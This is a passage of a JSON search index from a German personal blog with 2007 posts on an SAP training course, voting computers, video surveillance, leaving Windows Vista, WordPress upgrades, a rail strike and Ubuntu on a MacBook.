Für eine Neuinstallation mag es praktisch sein, aber auch dann bindet man doch vorhandene Collaboration-Produkte ein und ersetzt sie nicht.\nIch war anfangs geschockt, wie man 34 Personen zu diesem Kurs zusammenpferchen kann, da nur 18 Rechner im Schulungsraum waren. Nachdem dann aber nur wenig Arbeit am Rechner notwendig war, finde ich nur noch die Geruchsbelästigung störend. Man müßte im Prinzip ein Fenster dauerhaft offen halten, um eine erträgliche Sauerstoffmenge bzw. Frischluft im Raum zu haben, aber da es kalt war, wurde nur ein Minimum gelüftet.\nIch halte normalerweise schon 12 Personen in einem IT Kurs für das absolute Maximum, da bei größeren Teilnehmermengen nicht auf Fragen eingegangen werden kann. Man bezahlt schließlich eine Menge Geld für diese Kurse und da finde ich eine so große Teilnehmerzahl als absolut unmöglich. Wenn soviele Leute angemeldet sind, dann sollte man entweder einen zweiten Kurs machen, oder den Letzten absagen und einen Ersatztermin vorschlagen.\nEgal, ich hab mir jetzt den Frust von der Seele geschrieben. In fünf Tagen ist Weihnachten und ab Freitag mittag ist endlich Urlaub. Wird Zeit die Plätzchen und die Weihnachtsdeko rauszusuchen und langsam in Stimmung zu kommen. Ich werde ab Freitag mal fünf gerade sein lassen und ein wenig ruhiger werden.\nFrohe Weihnachten an Alle!\n","excerpt":"\u003cp\u003eSo, jetzt bin ich endlich fertig mit dem Kurs \u0026ldquo;Netweaver Überblick\u0026rdquo; in\nWalldorf.\u003c/p\u003e\n\u003cp\u003eErst dachte ich ja, daß meine Kollegen übertreiben, aber es ist schon\nkomisch in Walldorf. Auf der einen Seite sieht man ein altes\nverschlafenes Städtchen mit einer Unmenge an Kneipen, Restaurants und\nHotels. Auf der anderen Seite ist der \u0026ldquo;SAPplex\u0026rdquo; neben der Autobahn. Ein\nriesiges Gelände in Glas und Metall, den man nach einem kurzen\nSpaziergang über abgeerntete Felder erreichen kann.\u003c/p\u003e\n\u003cp\u003eMontag abend war ich Heidelberg in der Fussgängerzone und bin von einem\nWeihnachts-/Christkindlmarkt zum Nächsten gegangen. Das war wirklich\nschön und die Kulisse mit der beleuchteten Burg und den vielen\nWeihnachtslichtern war einfach toll.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-12-19-kurs-am-a-der-welt/","title":"Kurs am A… der Welt"},{"body":"Heute habe ich bei Daniela Nußbaum einen interessanten Link zur stressfreien Weihnachtszeit gefunden.\n","excerpt":"\u003cp\u003eHeute habe ich bei\n\u003ca href=\"http://www.erfolg-reich-frei.de/nussbaum.shtml\" target=\"_blank\"\u003eDaniela Nußbaum \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n einen\ninteressanten Link zur\n\u003ca href=\"http://www.erfolg-reich-frei.de/download/Stressfrei_durch_die_Vorweihnachtszeit.pdf\" target=\"_blank\"\u003estressfreien\nWeihnachtszeit \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n gefunden.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-12-18-stille-zeit/","title":"Stille Zeit"},{"body":"Als 24 Fan und als alter Computerfreak fand ich folgendes Video einfach cool.\nvia ringfahndung.de ","excerpt":"\u003cp\u003eAls 24 Fan und als alter Computerfreak fand ich\n\u003ca href=\"http://www.ringfahndung.de/archives/24-1994\" target=\"_blank\"\u003efolgendes Video \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n einfach\ncool.\u003c/p\u003e\n\u003cp\u003evia \u003ca href=\"http://www.ringfahndung.de\" target=\"_blank\"\u003eringfahndung.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-11-28-jack-bauer-in-1994/","title":"Jack Bauer 1994"},{"body":" […] Das Bundesinnenministerium \u0026ldquo;ist jedoch der Auffassung, dass die Wahl\nmit Wahlgeräten nach dem in Deutschland praktizierten Verfahren den\nAnforderungen an demokratische Wahlen voll entspricht\u0026rdquo;, heißt es.\n\u0026ldquo;Aufwendige Sicherheitsmaßnahmen würden die Wahl nicht nur verteuern,\nsondern sie auch für die Wähler und die Wahlhelfer deutlich\nverkomplizieren\u0026rdquo;. Dies ließe sich durch \u0026ldquo;abstrakte Risiken\u0026rdquo; nicht\nrechtfertigen. […]\nInnenministerium erteilt \u0026ldquo;verbesserten\u0026rdquo; Wahlcomputern Zulassung Schon lustig. Bei den Wahlcomputern sind es abstrakte Risiken, auf die man keine Rücksicht nehmen kann, schließlich ist ja auch \u0026ldquo;nur\u0026rdquo; eine demokratische Wahl betroffen.\nMit ähnlichen abstrakten Risiken werden vom gleichen Ministerium die Einschnitte in die Bürgerrechte gerechtfertigt. Warum darf das BMI die Angst vor Terrorismus schüren, aber gleichzeitig die Bedrohung für demokratische Wahlen vom Tisch wischen?\n","excerpt":"\u003cblockquote\u003e\n\u003cp\u003e[…] Das Bundesinnenministerium \u0026ldquo;ist jedoch der Auffassung, dass die Wahl\u003c/p\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003emit Wahlgeräten nach dem in Deutschland praktizierten Verfahren den\u003c/p\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003eAnforderungen an demokratische Wahlen voll entspricht\u0026rdquo;, heißt es.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u0026ldquo;Aufwendige Sicherheitsmaßnahmen würden die Wahl nicht nur verteuern,\u003c/p\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003esondern sie auch für die Wähler und die Wahlhelfer deutlich\u003c/p\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003everkomplizieren\u0026rdquo;. Dies ließe sich durch \u0026ldquo;abstrakte Risiken\u0026rdquo; nicht\u003c/p\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003erechtfertigen. […]\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"http://www.heise.de/newsticker/meldung/98369/from/atom10\" target=\"_blank\"\u003eInnenministerium\nerteilt \u0026ldquo;verbesserten\u0026rdquo; Wahlcomputern Zulassung \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eSchon lustig. Bei den Wahlcomputern sind es abstrakte Risiken, auf die\nman keine Rücksicht nehmen kann, schließlich ist ja auch \u0026ldquo;nur\u0026rdquo; eine\ndemokratische Wahl betroffen.\u003c/p\u003e\n\u003cp\u003eMit ähnlichen abstrakten Risiken werden vom gleichen Ministerium die\nEinschnitte in die Bürgerrechte gerechtfertigt. Warum darf das BMI die\nAngst vor Terrorismus schüren, aber gleichzeitig die Bedrohung für\ndemokratische Wahlen vom Tisch wischen?\u003cbr\u003e\n \u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-11-02-heise-online-innenministerium-erteilt-verbesserten-wahlcomputern-zulassung/","title":"heise online: Innenministerium erteilt \"verbesserten\" Wahlcomputern Zulassung"},{"body":" Deutschland ist neben Russland und den USA das einzige Land weltweit, das eine radargestützte Aufklärung aus dem All betreibt. Nach der vollständigen Inbetriebnahme des Systems im kommenden Jahr können hochauflösende Bilder von nahezu jedem Punkt der Erde angefertigt werden – unabhängig von Wetter und Tageszeit.\nDritter deutscher Radar-Aufklärungssatellit erfolgreich ins All transportiert Mich würde echt mal interessieren, für was Deutschland diese Satelliten braucht?\nEs gibt meiner Meinung nach nur sehr begrenzt zivile Nutzungsmöglichkeit für diese Technologie und läßt z.B. auch Galileo in einem neuen Licht erscheinen.\nIn einem älteren Telepolis-Artikel wird diese Technik etwas näher betrachtet.\n","excerpt":"\u003cblockquote\u003e\n\u003cp\u003eDeutschland ist neben Russland und den USA das einzige Land weltweit,\ndas eine radargestützte Aufklärung aus dem All betreibt. Nach der\nvollständigen Inbetriebnahme des Systems im kommenden Jahr können\nhochauflösende Bilder von nahezu jedem Punkt der Erde angefertigt werden\n– unabhängig von Wetter und Tageszeit.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"http://www.heise.de/newsticker/meldung/98329/from/atom10\" target=\"_blank\"\u003eDritter\ndeutscher Radar-Aufklärungssatellit erfolgreich ins All transportiert \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eMich würde echt mal interessieren, für was Deutschland diese Satelliten\nbraucht?\u003c/p\u003e\n\u003cp\u003eEs gibt meiner Meinung nach nur sehr begrenzt zivile Nutzungsmöglichkeit\nfür diese Technologie und läßt z.B. auch\n\u003ca href=\"http://de.wikipedia.org/wiki/Galileo_%28Satellitennavigation%29\" target=\"_blank\"\u003eGalileo \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in\neinem neuen Licht erscheinen.\u003c/p\u003e\n\u003cp\u003eIn einem älteren\n\u003ca href=\"http://www.heise.de/tp/r4/artikel/24/24342/1.html\" target=\"_blank\"\u003eTelepolis-Artikel \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nwird diese Technik etwas näher betrachtet.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-11-01-heise-3-deutscher-aufklarungssatellit-im-all/","title":"heise – 3. deutscher Aufklärungssatellit im All"},{"body":"Das Bundesinnenministerium hat einen Änderungsentwurf zum Bundespolizeigesetz erarbeitet, wonach die Bilder aus der Videoüberwachung auf Bahnhöfen und Flughäfen künftig einen ganzen Monat gespeichert werden sollen. Das berichtet das Magazin Focus. Bislang betrug die Speicherdauer lediglich 48 Stunden. Aus \u0026#34;polizeifachlicher Sicht\u0026#34; sei eine Verlängerung notwendig heise online – Bilder aus Videoüberwachung könnten künftig einen Monat gespeichert werden\nDas ist meiner Meinung nach ausgemachter Blödsinn. Es wird in diesem Zug oft erwähnt, daß aufgrund der Anschläge in der Londoner U-Bahn eine erhöhte Gefährdung auch für Deutschland besteht. In England stehen 20% der weltweiten Überwachungskameras, was etwa eine Kamera auf 14 Personen entspricht und trotz dieser Kameradichte und integrierter Gesichts- und Anomalieerkennung, die z.B. in den U-Bahnhöfen fast 100% entspricht, fanden die Anschläge in London statt. [siehe CCC – Überwachung des öffentlichen Raums ]\nEine Speicherung von 30 Tagen erhöht nur die Speichermenge um den Faktor 15. Diese gigantische Datenmenge kann man nicht mehr manuell auswerten, aber man hat dann entsprechend länger Zeit, die Videos nach \u0026ldquo;anormalem\u0026rdquo; Verhalten zu scannen, oder Bewegungsprofile über einen vollen Monat zu erstellen.\nFür sehr viel wichtiger halte ich es, das die Personalstärke bei den Strafverfolgern erhöht wird und nicht durch technischen \u0026ldquo;Fortschritt\u0026rdquo; weiter Personal eingespart wird. Die Präsenz auf den Straßen ist weit mehr Abschreckung, als eine Kamera!\nMir ist immer noch abschreckend in Erinnerung, daß im Anschluß an die Londoner Anschläge ein Unschuldiger erschossen wurde, weil er einem durch Indizien Verdächtigen ähnlich sah.\n","excerpt":"\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eDas Bundesinnenministerium hat einen Änderungsentwurf zum Bundespolizeigesetz erarbeitet, wonach die Bilder aus der Videoüberwachung auf Bahnhöfen und Flughäfen künftig einen ganzen Monat gespeichert werden sollen. Das berichtet das Magazin Focus. Bislang betrug die Speicherdauer lediglich \u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e48\u003c/span\u003e Stunden. Aus \u003cspan style=\"color:#2aa198\"\u003e\u0026#34;polizeifachlicher Sicht\u0026#34;\u003c/span\u003e sei eine Verlängerung notwendig\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eheise online – Bilder aus Videoüberwachung könnten künftig einen Monat\ngespeichert werden\u003c/p\u003e\n\u003cp\u003eDas ist meiner Meinung nach ausgemachter Blödsinn. Es wird in diesem Zug\noft erwähnt, daß aufgrund der Anschläge in der Londoner U-Bahn eine\nerhöhte Gefährdung auch für Deutschland besteht. In England stehen 20%\nder weltweiten Überwachungskameras, was etwa eine Kamera auf 14 Personen\nentspricht und trotz dieser Kameradichte und integrierter\n\u003ca href=\"http://www.heise.de/newsticker/meldung/34407\" target=\"_blank\"\u003eGesichts- \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n und\n\u003ca href=\"http://www.heise.de/newsticker/meldung/38441\" target=\"_blank\"\u003eAnomalieerkennung, \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n die\nz.B. in den U-Bahnhöfen fast 100% entspricht, fanden die Anschläge in\nLondon statt. [siehe \u003ca href=\"http://www.ccc.de/surveillance/\" target=\"_blank\"\u003eCCC – Überwachung\ndes öffentlichen Raums \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n]\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-10-28-heise-online-bilder-aus-videouberwachung-konnten-kunftig-einen-monat-gespeichert-werden/","title":"heise online – Bilder aus Videoüberwachung könnten künftig einen Monat gespeichert werden"},{"body":"Da gratuliere ich jetzt erstmal herzlich zu dieser Entscheidung.\n[\u0026amp;#8230;] ist in mir zunächst bloß die Überzeugung gereift, dass niemand Vista wirklich braucht. Außerhalb der Optik kann ich keine relevanten technischen Änderungen erkennen, die für einen flächendeckenden Umstieg auf Vista sprechen könnten. Aus Administratorsicht gibt es eher Dutzende Gründe genau diesen Wechsel NICHT zu vollziehen. [\u0026amp;#8230;] digitallife blog: Leaving Microsoft\nMir ging es vor einigen Wochen ähnlich. Ich mußte zu Testzwecken einen Rechner mit Vista installieren, um zu testen, warum das Citrix Webplugin nicht funktioniert. Es war wirklich abenteuerlich, wie langsam ein normaler PC nur mit Betriebssystem sein kann. Warum wurde die Netzwerk-Einstellung so gut versteckt? Ich habe ewig gebraucht, die Karte von DHCP auf statische IP umzustellen und als Ergebnis hatte ich vier oder fünf verschiedene Netzwerkumgebungen in meiner Systemsteuerung.\nIch würde auf keinen Fall wechseln und viele meiner Bekannten haben mit ihrem neuen Rechner XP als OS gewählt und sich nicht Vista andrehen lassen. Die Bevormundung von Microsoft halte ich für nicht tragbar und die letzten Patche , die ohne Zustimmung des Users installiert wurden, wären für mich Grund genug, um M$ den Rücken zu kehren. Privat nutze ich im Moment Mac OS X auf einem Macbook, allerdings ist mir hier die Bevormundung eigentlich auch zu groß. Deshalb habe ich parallel noch Ubuntu installiert und nutze immer öfter Gutsy Gibbon auf dem Macbook.\nDa ich auch beruflich viel mit Linux zu tun habe, ist mein Ziel nur noch Linux zu verwenden und sollte ich nochmal den Job wechseln, wird eines meiner Auswahlkriterien sein, daß die Firma vorallem oder ausschließlich Linux benutzt. Wie der Autor des Artikels habe ich auch mit OS/2 (2 und Warp) experimentiert und empfand die Arbeit damit als sehr gut, allerdings war die Treiberunterstützung absolut unzureichend. Ich habe damals ausschließlich mit Einzelplatzrechnern gearbeitet und kann daher nichts zu den Netzwerkfunktionen von OS/2 sagen.\nTags: Windows, Ubuntu\n","excerpt":"\u003cp\u003eDa gratuliere ich jetzt erstmal herzlich zu dieser Entscheidung.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e[\u0026amp;\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e#8230;] ist in mir zunächst bloß die Überzeugung gereift, dass niemand Vista wirklich braucht. Außerhalb der Optik kann ich keine relevanten technischen Änderungen erkennen, die für einen flächendeckenden Umstieg auf Vista sprechen könnten. Aus Administratorsicht gibt es eher Dutzende Gründe genau diesen Wechsel NICHT zu vollziehen. [\u0026amp;#8230;]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003edigitallife blog: Leaving Microsoft\u003c/p\u003e\n\u003cp\u003eMir ging es vor einigen Wochen ähnlich. Ich mußte zu Testzwecken einen\nRechner mit Vista installieren, um zu testen, warum das Citrix Webplugin\nnicht funktioniert. Es war wirklich abenteuerlich, wie langsam ein\nnormaler PC nur mit Betriebssystem sein kann. Warum wurde die\nNetzwerk-Einstellung so gut versteckt? Ich habe ewig gebraucht, die\nKarte von DHCP auf statische IP umzustellen und als Ergebnis hatte ich\nvier oder fünf verschiedene Netzwerkumgebungen in meiner\nSystemsteuerung.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-10-28-digitallife-blog-leaving-microsoft/","title":"digitallife blog: Leaving Microsoft"},{"body":"Ich habe beschlossen meinen Blog in Zukunft wieder werbefrei zu gestalten. Im Zuge des Updates auf 2.3 gingen verschiedene Plugins nicht mehr und ausserdem wollte ich mal wieder ein neues Layout benutzen.\nTrotz des deaktivierten Simple Tagging Plugins kamen beim Posten Fehler, daß der Table in der Datenbank nicht mehr gefunden wird. Mir wird die Fehlersuche jetzt etwas zu blöd. Ich habe die englische WordPress 2.3.1 installiert und übernehme nur den Inhalt der alten Posts. Plugins und Themes werden neu geladen und angepaßt. Es kann also die nächsten Tage noch ein paar Änderungen geben. Die Seite bleibt aber adsensefrei!\nUpdate Ich habe inzwischen das Theme ins Deutsche übersetzt und die Tagwolke über das zusätzliches Plugin Configurable Tag Cloud 2.51 wieder eingefügt. Das Ergebnis gefällt mir sehr gut, v.a. der Hintergrund ist für mich alten Chiemseeangler viel passender als das abgerundete Web2.0 Theme, das ich vorher benutzt habe.\nDie meisten Posts sind inzwischen wieder mit Tags versehen, allerdings habe ich nicht alle alten Posts “getagged”.\nAusserdem habe ich das Plugin WP Cache 2.1.2 , um die Zugriffszeiten auf die Seite zu verbessern und als Info WP-Pluginsused installiert.\nÜberrascht hat mich das WPG2-Plugin (Version 3.0.2) , da hier die Integration von Gallery2 weit schöner als in den 2.x-Versionen gelöst ist. Ich musste keine zusätzlichen Seiten für das Theme anlegen, da die Integration über eine zusätzliche Seite in WordPress erledigt wird.\n","excerpt":"\u003cp\u003eIch habe beschlossen meinen Blog in Zukunft wieder werbefrei zu\ngestalten. Im Zuge des Updates auf 2.3 gingen verschiedene Plugins nicht\nmehr und ausserdem wollte ich mal wieder ein neues Layout benutzen.\u003c/p\u003e\n\u003cp\u003eTrotz des deaktivierten Simple Tagging Plugins kamen beim Posten Fehler,\ndaß der Table in der Datenbank nicht mehr gefunden wird. Mir wird die\nFehlersuche jetzt etwas zu blöd. Ich habe die englische WordPress 2.3.1\ninstalliert und übernehme nur den Inhalt der alten Posts. Plugins und\nThemes werden neu geladen und angepaßt. Es kann also die nächsten Tage\nnoch ein paar Änderungen geben. Die Seite bleibt aber adsensefrei!\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eIch habe inzwischen das Theme ins Deutsche übersetzt und die Tagwolke\nüber das zusätzliches Plugin \u003ca href=\"https://www.stoeps.de/plugins\" target=\"_blank\"\u003eConfigurable\nTag Cloud 2.51 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n wieder eingefügt. Das Ergebnis gefällt mir sehr gut,\nv.a. der Hintergrund ist für mich alten Chiemseeangler viel passender\nals das abgerundete Web2.0 Theme, das ich vorher benutzt habe.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-10-27-update-und-uberarbeitung-des-layouts/","title":"Update und Überarbeitung des Layouts"},{"body":"So, jetzt hab ich das Update auf WordPress 2.3 auch gemacht und wie viele andere Blogger auch, sind ein paar Probleme aufgetreten.\nDas automatische Update über das Plugin “http://techie-buzz.com/[WordPress Automatic Upgrade]” hat gut funktioniert, allerdings wurden mir wie den anderen Bloggern auch, ein paar Datenbank-Tabellen gelöscht. Mal sehen, ob ich die alten Tags aus dem Simple-Tagging Plugin extrahieren kann und in die neue Tag-Funktion einbauen kann. Blöde Sache!\nAusserdem funktioniert mein Gallery2 Integration mit WPG2 nicht mehr. Da muss ich mal bisschen suchen, vielleicht hat das ja eine einfache Erklärung.\n","excerpt":"\u003cp\u003eSo, jetzt hab ich das Update auf WordPress 2.3 auch gemacht und wie\nviele andere Blogger auch, sind ein paar Probleme aufgetreten.\u003c/p\u003e\n\u003cp\u003eDas automatische Update über das Plugin\n“http://techie-buzz.com/[WordPress Automatic Upgrade]” hat gut\nfunktioniert, allerdings wurden mir wie den\n\u003ca href=\"http://money-machen.de/wordpress/wp_post2cat-doesnt-exist-wordpress-loescht-beim-update-mal-eben-drei-tabellen.html\" target=\"_blank\"\u003eanderen\nBloggern \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n auch, ein paar Datenbank-Tabellen gelöscht. Mal sehen, ob ich\ndie alten Tags aus dem Simple-Tagging Plugin extrahieren kann und in die\nneue Tag-Funktion einbauen kann. Blöde Sache!\u003c/p\u003e\n\u003cp\u003eAusserdem funktioniert mein Gallery2 Integration mit WPG2 nicht mehr. Da\nmuss ich mal bisschen suchen, vielleicht hat das ja eine einfache\nErklärung.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-10-26-update-auf-wordpress-23/","title":"Update auf WordPress 2.3"},{"body":"Gestern abend war wieder die Lange Nacht der Münchner Museen . Es war wieder eine gelungene Veranstaltung, diesmal fuhren fünf Sonderbuslinien die unterschiedlichen Museen an.\n","excerpt":"\u003cp\u003eGestern abend war wieder die\n\u003ca href=\"http://www.muenchen.de/verticals/Veranstaltungen/Events/LangeNachtMuseen/100715/programm.html\" target=\"_blank\"\u003eLange\nNacht der Münchner Museen \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. Es war wieder eine gelungene Veranstaltung,\ndiesmal fuhren fünf Sonderbuslinien die unterschiedlichen Museen an.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-10-21-lange-nacht-der-munchner-museen/","title":"Lange Nacht der Münchner Museen"},{"body":"Ich bin heute ausnahmsweise nicht mit der Bahn gefahren, habe aber trotzdem ewig gebraucht, da die Firmenparkplätze voll sind.\nStoibär hat heute einen guten Post dazu geschrieben, da ist nichts mehr hinzuzufügen. Ich bin 100% seiner Meinung.\n“[…]Nachdem Herr Mehdorn die GdL wochenlang nur hingehalten und diese ihre Streiks immer wieder verschoben hatte, macht Herr Schell nun also ernst.[…]\n","excerpt":"\u003cp\u003eIch bin heute ausnahmsweise nicht mit der Bahn gefahren, habe aber\ntrotzdem ewig gebraucht, da die Firmenparkplätze voll sind.\u003c/p\u003e\n\u003cp\u003eStoibär hat heute \u003ca href=\"http://www.stoibaer.de/bahnstreik.html\" target=\"_blank\"\u003eeinen guten\nPost \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n dazu geschrieben, da ist nichts mehr hinzuzufügen. Ich bin 100%\nseiner Meinung.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e“[…]Nachdem Herr Mehdorn die GdL wochenlang nur hingehalten und diese\nihre Streiks immer wieder verschoben hatte, macht Herr Schell nun also\nernst.[…]\u003c/p\u003e\u003c/blockquote\u003e","ref":"https://stoeps.de/posts/2007/2007-10-12-bahnstreik/","title":"Bahnstreik"},{"body":"Ein für mich neuer Pixar-Kurzfilm:\ngesehen bei Handelskraft. Ein wirklich netter Film und ich kann den kleinen grünen Mann gut verstehen. :-)\nDie Story: http://www.pixar.com/shorts/lift/index.html ","excerpt":"\u003cp\u003eEin für mich neuer Pixar-Kurzfilm:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.handelskraft.de/2007/10/11/pixars-lifted-hast-du-morgens-kopfschmerzen/\" target=\"_blank\"\u003egesehen\nbei Handelskraft. \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Ein wirklich netter Film und ich kann den kleinen\ngrünen Mann gut verstehen. :-)\u003c/p\u003e\n\u003cp\u003eDie Story: \u003ca href=\"http://www.pixar.com/shorts/lift/index.html\" target=\"_blank\"\u003ehttp://www.pixar.com/shorts/lift/index.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-10-11-pixar-hat-es-einfach-drauf/","title":"Pixar hat es einfach drauf"},{"body":"Im Moment ist es hier im Blog etwas ruhiger. Ich habe meinen neuen Job angetreten und versuche mich von meinem alten Job entgültig zu trennen. Gar nicht so einfach, da ich solange das neue Büro nicht fertig ist, auf meinem alten Platz bei meinen Kollegen der Stadtverwaltung sitze. Mitte November sollte dann endgültig der Umzug, in die neuen Büroräume meines neuen Arbeitgebers Stadtwerke Rosenheim , stattfinden.\n","excerpt":"\u003cp\u003eIm Moment ist es hier im Blog etwas ruhiger. Ich habe meinen neuen Job\nangetreten und versuche mich von meinem alten Job entgültig zu trennen.\nGar nicht so einfach, da ich solange das neue Büro nicht fertig ist, auf\nmeinem alten Platz bei meinen Kollegen der\n\u003ca href=\"http://www.rosenheim.de\" target=\"_blank\"\u003eStadtverwaltung \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n sitze. Mitte November sollte\ndann endgültig der Umzug, in die neuen Büroräume meines neuen\nArbeitgebers \u003ca href=\"http://www.swro.de\" target=\"_blank\"\u003eStadtwerke Rosenheim \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, stattfinden.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-10-11-nichts-neues/","title":"Nichts Neues"},{"body":"Ich habe am Wochenende die neue Beta am Macbook installiert und bin begeistert!\nIch musste nur die Madwifi-Sourcen von www.madwifi.org kompilieren, damit die Wifi-Karte funktioniert, Sound, Bildschirm, etc. wurde direkt erkannt und eingerichtet.\nIch habe die 64-bit Version für die Installation verwendet, daher gibt es momentan noch ein paar kleine Wehwehchen wegen Flash und die Lautstärkesteuerung haken noch ein wenig.\n","excerpt":"\u003cp\u003eIch habe am Wochenende die neue Beta am Macbook installiert und bin\nbegeistert!\u003c/p\u003e\n\u003cp\u003eIch musste nur die Madwifi-Sourcen von \u003ca href=\"https://www.madwifi.org\" target=\"_blank\"\u003ewww.madwifi.org \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n kompilieren,\ndamit die Wifi-Karte funktioniert, Sound, Bildschirm, etc. wurde direkt\nerkannt und eingerichtet.\u003c/p\u003e\n\u003cp\u003eIch habe die 64-bit Version für die Installation verwendet, daher gibt\nes momentan noch ein paar kleine Wehwehchen wegen Flash und die\nLautstärkesteuerung haken noch ein wenig.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-10-04-gutsy-gibbon-beta-on-macbook-intel-core2duo/","title":"Gutsy Gibbon Beta on Macbook Intel Core2Duo"},{"body":"Heue auf Google-News war die folgende Meldung unter Gesundheit einsortiert.\nDer Algorithmus ist nicht schlecht, aber wie man sieht z.T. noch fehlerhaft. In der Podcastfolge 85 des Z! Podcasts wurde der Algorithmus ebenfalls angesprochen. Mal sehen, wie das in Zukunft mit den neuen Argenturmeldungen ist.\n","excerpt":"\u003cp\u003eHeue auf \u003ca href=\"http://news.google.de\" target=\"_blank\"\u003eGoogle-News \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n war die folgende Meldung\nunter Gesundheit einsortiert.\u003c/p\u003e\n\u003cp\u003eDer Algorithmus ist nicht schlecht, aber wie man sieht z.T. noch\nfehlerhaft. In der\n\u003ca href=\"http://www.z-pod.de/archives/187-Z!-Episode-85-Vom-Volkswagen-zum-Apfelauto.html\" target=\"_blank\"\u003ePodcastfolge\n85 des Z! Podcasts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n wurde der Algorithmus ebenfalls angesprochen. Mal\nsehen, wie das in Zukunft mit den neuen\n\u003ca href=\"http://www.spiegel.de/netzwelt/web/0,1518,503346,00.html\" target=\"_blank\"\u003eArgenturmeldungen \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nist.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-09-22-google-news-algorithmus-markiert-falsch/","title":"Google-News Algorithmus markiert falsch"},{"body":"Heute auf MindMapper.com entdeckt. Die Software ist ihrer Zeit voraus. :-)\n","excerpt":"\u003cp\u003eHeute auf \u003ca href=\"http://www.mindmapper.com\" target=\"_blank\"\u003eMindMapper.com \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n entdeckt. Die\nSoftware ist ihrer Zeit voraus. :-)\u003c/p\u003e\n\u003cfigure\u003e\u003ca href=\"/images/2007/09/screenshot_02.png\"\u003e\u003cimg 